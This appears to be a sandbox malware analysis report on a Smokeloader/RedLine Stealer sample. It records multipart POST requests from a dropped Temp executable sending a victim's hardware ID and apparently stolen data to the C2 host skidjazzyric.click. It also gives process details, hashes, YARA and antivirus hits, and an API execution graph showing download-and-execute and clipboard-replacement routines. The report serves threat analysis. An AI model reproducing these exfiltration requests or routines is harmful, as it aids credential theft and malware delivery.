                                                                                              2025-01-10 15:09:34 UTC12780OUTData Raw: 2d 2d 31 58 47 5a 30 53 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 33 39 30 34 46 38 38 33 37 37 42 34 36 37 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 31 58 47 5a 30 53 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 58 47 5a 30 53 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 31 58 47 5a 30 53 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                              Data Ascii: --1XGZ0SPZContent-Disposition: form-data; name="hwid"F43904F88377B467D0632DF0E28DC412--1XGZ0SPZContent-Disposition: form-data; name="pid"2--1XGZ0SPZContent-Disposition: form-data; name="lid"4h5VfH----1XGZ0SPZContent-Disposition:
                                                                                              2025-01-10 15:09:35 UTC1126INHTTP/1.1 200 OK
                                                                                              Date: Fri, 10 Jan 2025 15:09:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=n9a4jak4gd1jhvihp45vjsoc6e; expires=Tue, 06 May 2025 08:56:13 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QjWp6Rk7isPD6JrSse4tN21TVjBLfAxsbvTiqkVUcaYUKuIuHTHPLUDurRNNE0OZs2ly11yfxgdKUbVEmUOHjLC5VBRqh3OUhM0O%2FWmvxi9lgEFLOpT9Ph6OW0JvJB5L2jlhBoE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8ffd96c0e8fa4344-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1734&rtt_var=650&sent=9&recv=17&lost=0&retrans=0&sent_bytes=3056&recv_bytes=13712&delivery_rate=2524495&cwnd=48&unsent_bytes=0&cid=3c3161ff91190d43&ts=1038&x=0"
                                                                                              2025-01-10 15:09:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2025-01-10 15:09:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.949776104.21.32.14437688C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-10 15:09:36 UTC278OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=WZI9I9BZA1IQ
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 15022
                                                                                              Host: skidjazzyric.click
                                                                                              2025-01-10 15:09:36 UTC15022OUTData Raw: 2d 2d 57 5a 49 39 49 39 42 5a 41 31 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 33 39 30 34 46 38 38 33 37 37 42 34 36 37 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 57 5a 49 39 49 39 42 5a 41 31 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 5a 49 39 49 39 42 5a 41 31 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 57 5a 49 39 49 39 42 5a 41 31 49 51 0d 0a 43 6f 6e 74 65
                                                                                              Data Ascii: --WZI9I9BZA1IQContent-Disposition: form-data; name="hwid"F43904F88377B467D0632DF0E28DC412--WZI9I9BZA1IQContent-Disposition: form-data; name="pid"2--WZI9I9BZA1IQContent-Disposition: form-data; name="lid"4h5VfH----WZI9I9BZA1IQConte
                                                                                              2025-01-10 15:09:36 UTC1137INHTTP/1.1 200 OK
                                                                                              Date: Fri, 10 Jan 2025 15:09:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=94p1ua5351mneu8irc6cuiqr5t; expires=Tue, 06 May 2025 08:56:15 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fu%2FQOVSoppMD2vpKmoIm1fyREMLWZy5nq%2FpZ75jrWsJjNMr%2FPYjBbOBWGpKCQwS2xWmfYm2TcBi1kuqCnj0gYYijlNQQbXbcEg6n5%2Bf%2Fy6W8qjbLHZCJszb3Eod74R89I65Kxvw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8ffd96ce0f008cda-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1805&rtt_var=678&sent=10&recv=20&lost=0&retrans=0&sent_bytes=3057&recv_bytes=15958&delivery_rate=2421227&cwnd=244&unsent_bytes=0&cid=22847591766cb6e6&ts=563&x=0"
                                                                                              2025-01-10 15:09:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2025-01-10 15:09:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.949784104.21.32.14437688C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-10 15:09:38 UTC278OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=04OIJ16I85GT
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20538
                                                                                              Host: skidjazzyric.click
                                                                                              2025-01-10 15:09:38 UTC15331OUTData Raw: 2d 2d 30 34 4f 49 4a 31 36 49 38 35 47 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 33 39 30 34 46 38 38 33 37 37 42 34 36 37 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 30 34 4f 49 4a 31 36 49 38 35 47 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 34 4f 49 4a 31 36 49 38 35 47 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 30 34 4f 49 4a 31 36 49 38 35 47 54 0d 0a 43 6f 6e 74 65
                                                                                              Data Ascii: --04OIJ16I85GTContent-Disposition: form-data; name="hwid"F43904F88377B467D0632DF0E28DC412--04OIJ16I85GTContent-Disposition: form-data; name="pid"3--04OIJ16I85GTContent-Disposition: form-data; name="lid"4h5VfH----04OIJ16I85GTConte
                                                                                              2025-01-10 15:09:38 UTC5207OUTData Raw: bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: s}Q0u?4E([:s~X`nO
                                                                                              2025-01-10 15:09:42 UTC1131INHTTP/1.1 200 OK
                                                                                              Date: Fri, 10 Jan 2025 15:09:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=0g6b1ki1oasqv448mjoqaik65k; expires=Tue, 06 May 2025 08:56:18 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=06vfziP5qBetatOnAKnIdiUSAA2ilgZzwi40f6xF7%2BzknQk7Fkxhv47983e1dVWXxNqJv5gL%2FI7b7opodvamckXgWFADeGeLknfM0tBPV94Op0IsXiLPag65b51hHbBNyjn9gwE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8ffd96dddfb741a6-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6952&min_rtt=1600&rtt_var=3929&sent=12&recv=25&lost=0&retrans=0&sent_bytes=3056&recv_bytes=21496&delivery_rate=2737500&cwnd=242&unsent_bytes=0&cid=ee0c37d3bed5576e&ts=4336&x=0"
                                                                                              2025-01-10 15:09:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2025-01-10 15:09:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:10:09:24
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Users\user\Desktop\Mmm7GmDcR4.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Mmm7GmDcR4.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:394'240 bytes
                                                                                              MD5 hash:C4A14694E0FB534E9CBFBFF50BE90BA3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3770031470.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:10:09:29
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:333'312 bytes
                                                                                              MD5 hash:1B513E6F8721E444A9364DD93630F015
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1674790752.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1675015771.0000000000882000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 42%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:10:09:42
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7688 -s 1792
                                                                                              Imagebase:0x550000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:2.1%
                                                                                                Dynamic/Decrypted Code Coverage:22%
                                                                                                Signature Coverage:5.3%
                                                                                                Total number of Nodes:815
                                                                                                Total number of Limit Nodes:25
                                                                                                execution_graph 64853 402ba3 RegCreateKeyExW 64854 402bd1 RegSetValueExW 64853->64854 64855 402be5 64853->64855 64854->64855 64856 402bf3 64855->64856 64857 402bea RegCloseKey 64855->64857 64857->64856 64858 404b84 64859 404b90 Concurrency::details::ResourceManager::RemoveExecutionResource 64858->64859 64864 40fb02 64859->64864 64863 404bb0 ~ListArray Concurrency::details::ResourceManager::RemoveExecutionResource 64865 40fb07 64864->64865 64867 404b99 64865->64867 64869 40fb23 ListArray 64865->64869 64888 42ad6e 64865->64888 64895 42f440 7 API calls 2 library calls 64865->64895 64872 4051c6 64867->64872 64896 4285fd RaiseException 64869->64896 64871 4103bc 64873 4051d2 __Cnd_init Concurrency::details::ResourceManager::RemoveExecutionResource 64872->64873 64875 4051ea __Mtx_init 64873->64875 64907 40ce28 28 API calls std::_Throw_Cpp_error 64873->64907 64879 405211 64875->64879 64908 40ce28 28 API calls std::_Throw_Cpp_error 64875->64908 64899 4010ea 64879->64899 64882 405260 64884 405275 ~ListArray 64882->64884 64910 401128 30 API calls 2 library calls 64882->64910 64911 401109 64884->64911 64887 40529a Concurrency::details::ResourceManager::RemoveExecutionResource 64887->64863 64893 433697 std::_Locinfo::_Locinfo_ctor 64888->64893 64889 4336d5 64898 42eab9 20 API calls _Atexit 64889->64898 64891 4336c0 RtlAllocateHeap 64892 4336d3 64891->64892 64891->64893 64892->64865 64893->64889 64893->64891 64897 42f440 7 API calls 2 library calls 64893->64897 64895->64865 64896->64871 64897->64893 64898->64892 64915 40d309 64899->64915 64902 401103 64904 40cee9 64902->64904 64947 42e104 64904->64947 64907->64875 64908->64879 64909 40ce28 28 API calls std::_Throw_Cpp_error 64909->64882 64910->64882 64912 401115 __Mtx_unlock 64911->64912 64913 401122 64912->64913 65279 40ce28 28 API calls std::_Throw_Cpp_error 64912->65279 64913->64887 64919 40d063 64915->64919 64918 40ce28 28 API calls std::_Throw_Cpp_error 64918->64902 64920 40d0b9 64919->64920 64921 40d08b GetCurrentThreadId 64919->64921 64923 40d0e3 64920->64923 64924 40d0bd GetCurrentThreadId 64920->64924 64922 40d096 GetCurrentThreadId 64921->64922 64933 40d0b1 64921->64933 64922->64933 64925 40d17c GetCurrentThreadId 64923->64925 64928 40d103 64923->64928 64927 40d0cc 64924->64927 64925->64927 64926 40d1d3 GetCurrentThreadId 64926->64933 64927->64926 64927->64933 64944 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64928->64944 64932 4010f6 64932->64902 64932->64918 64937 40f8c5 64933->64937 64934 40d13b GetCurrentThreadId 64934->64927 64935 40d10e __Xtime_diff_to_millis2 64934->64935 64935->64927 64935->64933 64935->64934 64945 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64935->64945 64938 40f8d0 IsProcessorFeaturePresent 64937->64938 64939 40f8ce 64937->64939 64941 40f943 64938->64941 64939->64932 64946 40f907 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64941->64946 64943 40fa26 64943->64932 64944->64935 64945->64935 64946->64943 64948 42e111 64947->64948 64949 42e125 64947->64949 64970 42eab9 20 API calls _Atexit 64948->64970 64961 42e0bb 64949->64961 64952 42e116 64971 42a58d 26 API calls _Deallocate 64952->64971 64955 42e13a CreateThread 64956 42e165 64955->64956 64957 42e159 GetLastError 64955->64957 64999 42dfb0 64955->64999 64973 42e02d 64956->64973 64972 42ea83 20 API calls 3 library calls 64957->64972 64958 40524d 64958->64882 64958->64909 64981 434d1a 64961->64981 64965 42e0d4 64966 42e0f3 64965->64966 64967 42e0db GetModuleHandleExW 64965->64967 64968 42e02d __Thrd_start 22 API calls 64966->64968 64967->64966 64969 42e0fd 64968->64969 64969->64955 64969->64956 64970->64952 64971->64958 64972->64956 64974 42e03a 64973->64974 64980 42e05e 64973->64980 64975 42e040 CloseHandle 64974->64975 64976 42e049 64974->64976 64975->64976 64977 42e058 64976->64977 64978 42e04f FreeLibrary 64976->64978 64979 43345a _free 20 API calls 64977->64979 64978->64977 64979->64980 64980->64958 64982 434d27 64981->64982 64983 434d67 64982->64983 64984 434d52 HeapAlloc 64982->64984 64988 434d3b std::_Locinfo::_Locinfo_ctor 64982->64988 64997 42eab9 20 API calls _Atexit 64983->64997 64985 434d65 64984->64985 64984->64988 64987 42e0cb 64985->64987 64990 43345a 64987->64990 64988->64983 64988->64984 64996 42f440 7 API calls 2 library calls 64988->64996 64991 43348e _free 64990->64991 64992 433465 HeapFree 64990->64992 64991->64965 64992->64991 64993 43347a 64992->64993 64998 42eab9 20 API calls _Atexit 64993->64998 64995 433480 GetLastError 64995->64991 64996->64988 64997->64987 64998->64995 65000 42dfbc _Atexit 64999->65000 65001 42dfc3 GetLastError ExitThread 65000->65001 65002 42dfd0 65000->65002 65015 431eca GetLastError 65002->65015 65004 42dfd5 65035 435561 65004->65035 65007 42dfeb 65042 401169 65007->65042 65016 431ee0 65015->65016 65017 431ee6 65015->65017 65050 435101 11 API calls 2 library calls 65016->65050 65019 434d1a _Atexit 20 API calls 65017->65019 65020 431f35 SetLastError 65017->65020 65021 431ef8 65019->65021 65020->65004 65023 431f00 65021->65023 65051 435157 11 API calls 2 library calls 65021->65051 65025 43345a _free 20 API calls 65023->65025 65024 431f15 65024->65023 65026 431f1c 65024->65026 65027 431f06 65025->65027 65052 431d3c 20 API calls _Atexit 65026->65052 65028 431f41 SetLastError 65027->65028 65053 42df6d 167 API calls 2 library calls 65028->65053 65030 431f27 65032 43345a _free 20 API calls 65030->65032 65034 431f2e 65032->65034 65033 431f4d 65034->65020 65034->65028 65036 435586 65035->65036 65037 43557c 65035->65037 65054 434e83 5 API calls 2 library calls 65036->65054 65039 40f8c5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65037->65039 65040 42dfe0 65039->65040 65040->65007 65049 435494 10 API calls 2 library calls 65040->65049 65041 43559d 65041->65037 65055 4057f6 65042->65055 65068 40155a Sleep 65042->65068 65043 401173 65046 42e189 65043->65046 65247 42e064 65046->65247 65048 42e196 65049->65007 65050->65017 65051->65024 65052->65030 65053->65033 65054->65041 65056 405802 Concurrency::details::ResourceManager::RemoveExecutionResource 65055->65056 65057 4010ea std::_Cnd_initX 35 API calls 65056->65057 65059 405817 __Cnd_signal 65057->65059 65058 40582f 65061 401109 std::_Cnd_initX 28 API calls 65058->65061 65059->65058 65114 40ce28 28 API calls std::_Throw_Cpp_error 65059->65114 65062 405838 65061->65062 65070 4029ea InternetOpenW 65062->65070 65086 4016df 65062->65086 65065 40583f ~ListArray Concurrency::details::ResourceManager::RemoveExecutionResource 65065->65043 65069 4016d5 65068->65069 65071 402b92 65070->65071 65072 402a1d InternetOpenUrlW 65070->65072 65075 40f8c5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65071->65075 65072->65071 65073 402a33 GetTempPathW GetTempFileNameW 65072->65073 65115 42a87e 65073->65115 65077 402ba1 65075->65077 65107 40e761 65077->65107 65078 402b81 InternetCloseHandle InternetCloseHandle 65078->65071 65079 402a9e ListArray 65080 402ab6 InternetReadFile WriteFile 65079->65080 65081 402af6 CloseHandle 65079->65081 65080->65079 65117 402956 65081->65117 65084 402b21 ShellExecuteExW 65084->65078 65085 402b68 WaitForSingleObject CloseHandle 65084->65085 65085->65078 65225 40fddc 65086->65225 65088 4016eb Sleep 65226 40cc06 65088->65226 65091 40cc06 28 API calls 65092 401711 65091->65092 65093 40171b OpenClipboard 65092->65093 65094 401943 Sleep 65093->65094 65095 40172b GetClipboardData 65093->65095 65094->65093 65096 40173b GlobalLock 65095->65096 65097 40193d CloseClipboard 65095->65097 65096->65097 65100 401748 _strlen 65096->65100 65097->65094 65098 40cc06 28 API calls 65098->65100 65100->65097 65100->65098 65101 4018d2 EmptyClipboard GlobalAlloc 65100->65101 65104 40cbbd 28 API calls std::system_error::system_error 65100->65104 65230 402e5c 167 API calls 2 library calls 65100->65230 65232 40ca9c 26 API calls _Deallocate 65100->65232 65101->65100 65102 4018eb GlobalLock 65101->65102 65231 426980 65102->65231 65104->65100 65106 401905 GlobalUnlock SetClipboardData GlobalFree 65106->65100 65238 40dee0 65107->65238 65112 40e806 65112->65065 65113 40e778 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65245 40deec LeaveCriticalSection std::_Lockit::~_Lockit 65113->65245 65114->65058 65116 402a6c CreateFileW 65115->65116 65116->65078 65116->65079 65118 402981 ListArray _wcslen 65117->65118 65127 42b444 65118->65127 65122 4029ae 65149 404329 65122->65149 65125 40f8c5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65126 4029e8 65125->65126 65126->65078 65126->65084 65153 42b0f6 65127->65153 65130 402819 65131 402828 Concurrency::details::ResourceManager::RemoveExecutionResource 65130->65131 65179 4032d3 65131->65179 65133 40283c 65195 403b81 65133->65195 65135 402850 65136 402862 65135->65136 65137 40287e 65135->65137 65222 403290 167 API calls 65136->65222 65201 403108 65137->65201 65140 40288b 65204 403c16 65140->65204 65142 40289d 65214 403cb8 65142->65214 65143 402875 std::ios_base::_Ios_base_dtor Concurrency::details::ResourceManager::RemoveExecutionResource 65143->65122 65145 4028ba 65146 404329 26 API calls 65145->65146 65147 4028d9 65146->65147 65223 403290 167 API calls 65147->65223 65150 404331 65149->65150 65151 4029da 65149->65151 65224 40cc8c 26 API calls 2 library calls 65150->65224 65151->65125 65154 42b123 65153->65154 65155 42b127 65154->65155 65156 42b132 65154->65156 65157 42b14a 65154->65157 65160 40f8c5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65155->65160 65159 42eab9 __Wcscoll 20 API calls 65156->65159 65158 42a737 __cftoe 162 API calls 65157->65158 65162 42b155 65158->65162 65161 42b137 65159->65161 65163 40299a 65160->65163 65164 42a58d ___std_exception_copy 26 API calls 65161->65164 65165 42b160 65162->65165 65166 42b2f7 65162->65166 65163->65130 65164->65155 65168 42b208 WideCharToMultiByte 65165->65168 65170 42b16b 65165->65170 65175 42b1a5 WideCharToMultiByte 65165->65175 65167 42b324 WideCharToMultiByte 65166->65167 65173 42b302 65166->65173 65167->65173 65168->65170 65171 42b233 65168->65171 65169 42eab9 __Wcscoll 20 API calls 65169->65155 65170->65155 65176 42eab9 __Wcscoll 20 API calls 65170->65176 65171->65170 65174 42b23c GetLastError 65171->65174 65173->65155 65173->65169 65174->65170 65178 42b24b 65174->65178 65175->65170 65176->65155 65177 42b264 WideCharToMultiByte 65177->65173 65177->65178 65178->65155 65178->65173 65178->65177 65180 4032df Concurrency::details::ResourceManager::RemoveExecutionResource 65179->65180 65181 404672 167 API calls 65180->65181 65182 40330b 65181->65182 65183 404843 167 API calls 65182->65183 65184 403334 65183->65184 65185 404582 26 API calls 65184->65185 65186 403343 65185->65186 65187 40ddd9 167 API calls 65186->65187 65194 403388 std::ios_base::_Ios_base_dtor 65186->65194 65189 403358 65187->65189 65188 4033c4 Concurrency::details::ResourceManager::RemoveExecutionResource 65188->65133 65191 404582 26 API calls 65189->65191 65189->65194 65190 40c60e 167 API calls 65190->65188 65192 403369 65191->65192 65193 404c0a 167 API calls 65192->65193 65193->65194 65194->65188 65194->65190 65196 403b8d Concurrency::details::ResourceManager::RemoveExecutionResource 65195->65196 65197 4042a5 167 API calls 65196->65197 65198 403b99 65197->65198 65199 403bbd Concurrency::details::ResourceManager::RemoveExecutionResource 65198->65199 65200 4034f1 167 API calls 65198->65200 65199->65135 65200->65199 65202 40434c 28 API calls 65201->65202 65203 403122 ListArray 65202->65203 65203->65140 65205 403c22 Concurrency::details::ResourceManager::RemoveExecutionResource 65204->65205 65206 40c60e 167 API calls 65205->65206 65207 403c45 65206->65207 65208 4042a5 167 API calls 65207->65208 65209 403c4f 65208->65209 65211 403c92 Concurrency::details::ResourceManager::RemoveExecutionResource 65209->65211 65213 4034f1 167 API calls 65209->65213 65210 403c70 65210->65211 65212 4046c0 167 API calls 65210->65212 65211->65142 65212->65211 65213->65210 65215 403cc4 __EH_prolog3_catch 65214->65215 65216 4042a5 167 API calls 65215->65216 65218 403cdd 65216->65218 65217 4046c0 167 API calls 65220 403d66 Concurrency::details::ResourceManager::RemoveExecutionResource 65217->65220 65219 403d0d 65218->65219 65221 403695 40 API calls 65218->65221 65219->65217 65220->65145 65221->65219 65222->65143 65223->65143 65224->65151 65225->65088 65227 40cc22 _strlen 65226->65227 65233 40cbbd 65227->65233 65229 401704 65229->65091 65230->65100 65231->65106 65232->65100 65234 40cbf0 65233->65234 65235 40cbcc BuildCatchObjectHelperInternal 65233->65235 65234->65235 65237 40cb52 28 API calls 4 library calls 65234->65237 65235->65229 65237->65235 65246 40f220 EnterCriticalSection 65238->65246 65240 40deea 65241 40ce8f GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65240->65241 65242 40cec8 65241->65242 65243 40cebd CloseHandle 65241->65243 65244 40cecc GetCurrentThreadId 65242->65244 65243->65244 65244->65113 65245->65112 65246->65240 65256 431f4e GetLastError 65247->65256 65249 42e073 ExitThread 65250 42e091 65253 42e09d CloseHandle 65250->65253 65254 42e0a4 65250->65254 65253->65254 65254->65249 65255 42e0b0 FreeLibraryAndExitThread 65254->65255 65257 431f6d 